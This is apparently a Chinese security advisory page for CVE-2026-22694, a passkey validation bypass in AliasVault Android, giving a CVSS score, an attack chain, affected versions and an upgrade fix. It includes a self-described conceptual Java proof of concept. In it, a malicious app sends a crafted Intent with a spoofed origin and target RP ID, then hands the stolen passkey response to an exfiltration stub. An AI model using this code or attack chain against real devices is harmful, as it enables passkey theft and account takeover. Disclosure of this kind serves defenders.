IPBUF安全漏洞报告
English
CVE-2026-22694 CVSS 6.1 中危

CVE-2026-22694 AliasVault Android passkey验证绕过漏洞

披露日期: 2026-01-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-22694
漏洞类型
访问控制/身份验证绕过
CVSS评分
6.1 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
AliasVault Android

相关标签

CVE-2026-22694AliasVaultAndroidpasskeyWebAuthnFIDO2身份验证绕过访问控制Credential Provider安全漏洞

漏洞概述

CVE-2026-22694是AliasVault Android应用中的一个安全漏洞,影响版本0.24.0至0.25.2。AliasVault是一款注重隐私的密码管理器,集成了邮件别名功能。该漏洞存在于Android应用处理passkey请求的验证流程中。在特定本地条件下,恶意应用可以尝试获取其未被授权访问的网站的passkey响应。漏洞的根本原因是对调用应用的标识、来源和RP ID(依赖方标识符)的验证不完整。攻击者需要本地访问设备并诱导用户交互才能利用此漏洞。成功利用可能导致机密性受损(低影响)和完整性受损(高影响),但不影响可用性。开发者已在0.25.3版本中修复此问题。

技术细节

该漏洞属于Android Credential Provider安全绕过问题。在WebAuthn/FIDO2 passkey认证流程中,AliasVault作为Android系统的凭证提供程序(Credential Provider),负责响应来自应用的passkey请求。漏洞源于对以下三个关键字段的验证不完整:1) 调用应用的身份验证(Calling App Identity):未正确验证请求来自哪个应用;2) 来源验证(Origin):未确保请求来自合法的网站来源;3) RP ID验证:未严格匹配依赖方标识符。由于这些验证缺陷,恶意应用可以伪装成合法的第三方应用,诱导AliasVault返回本应属于其他网站的passkey凭证。攻击者需要构造特殊的Android Intent请求,并利用AliasVault的验证漏洞来获取目标网站的passkey响应。

攻击链分析

STEP 1
步骤1
攻击者在Android设备上安装恶意应用,该应用伪装成合法的第三方应用
STEP 2
步骤2
恶意应用构造特殊的passkey请求Intent,针对目标网站的RP ID(如bank.com)
STEP 3
步骤3
恶意应用调用AliasVault作为Credential Provider,发送伪造的请求
STEP 4
步骤4
AliasVault由于验证不完整,未能正确识别调用应用身份、来源和RP ID的异常
STEP 5
步骤5
用户被诱导进行交互(如点击确认),AliasVault返回目标网站的passkey响应
STEP 6
步骤6
恶意应用获取passkey响应后,将其发送到攻击者控制的服务器
STEP 7
步骤7
攻击者利用窃取的passkey响应,在目标网站上完成身份认证,实现账户接管

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2026-22694 PoC - Malicious Android App Attempting Passkey Hijacking // This is a conceptual PoC for educational purposes only package com.malicious.app; import android.app.Activity; import android.content.Intent; import android.os.Bundle; import androidx.annotation.NonNull; import androidx.annotation.Nullable; public class PasskeyHijackActivity extends Activity { private static final String ALIASVAULT_PACKAGE = "com.aliasvault.android"; private static final int REQUEST_PASSKEY = 1001; // Target RP ID the attacker wants to obtain passkey for private static final String TARGET_RP_ID = "legitimate-website.com"; @Override protected void onCreate(@Nullable Bundle savedInstanceState) { super.onCreate(savedInstanceState); // Craft malicious passkey request // Exploiting incomplete validation of: // 1. Calling app identity // 2. Origin // 3. RP ID Intent maliciousIntent = new Intent(); maliciousIntent.setPackage(ALIASVAULT_PACKAGE); maliciousIntent.setAction("android.credentials.VIEW_PASSKEY"); // Inject manipulated RP ID maliciousIntent.putExtra("rp_id", TARGET_RP_ID); // Spoof origin (incomplete validation allows this) maliciousIntent.putExtra("origin", "https://malicious-site.com"); // Missing proper app signature verification maliciousIntent.putExtra("calling_package", getPackageName()); startActivityForResult(maliciousIntent, REQUEST_PASSKEY); } @Override protected void onActivityResult(int requestCode, int resultCode, @Nullable Intent data) { super.onActivityResult(requestCode, resultCode, data); if (requestCode == REQUEST_PASSKEY) { // If successful, attacker obtains passkey response if (resultCode == RESULT_OK && data != null) { String passkeyResponse = data.getStringExtra("passkey_response"); // Exfiltrate passkey to attacker server exfiltrateData(passkeyResponse); } } } private void exfiltrateData(String data) { // Send stolen passkey to attacker-controlled server } } /* Fix verification in AliasVault Android Credential Provider: 1. Verify calling app's signature certificate 2. Validate origin matches expected domain 3. Strictly check RP ID hash 4. Implement proper app binding verification */

影响范围

AliasVault Android 0.24.0
AliasVault Android 0.24.1
AliasVault Android 0.24.2
AliasVault Android 0.24.3
AliasVault Android 0.24.4
AliasVault Android 0.25.0
AliasVault Android 0.25.1
AliasVault Android 0.25.2

防御指南

临时缓解措施
立即将AliasVault Android应用升级至0.25.3版本,该版本修复了对调用应用身份、origin和RP ID的验证缺陷。在升级前,应避免安装来源不明的Android应用,并谨慎授权应用访问凭证提供商功能。建议启用设备安全设置中的验证应用功能,仅允许受信任的应用访问凭据。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表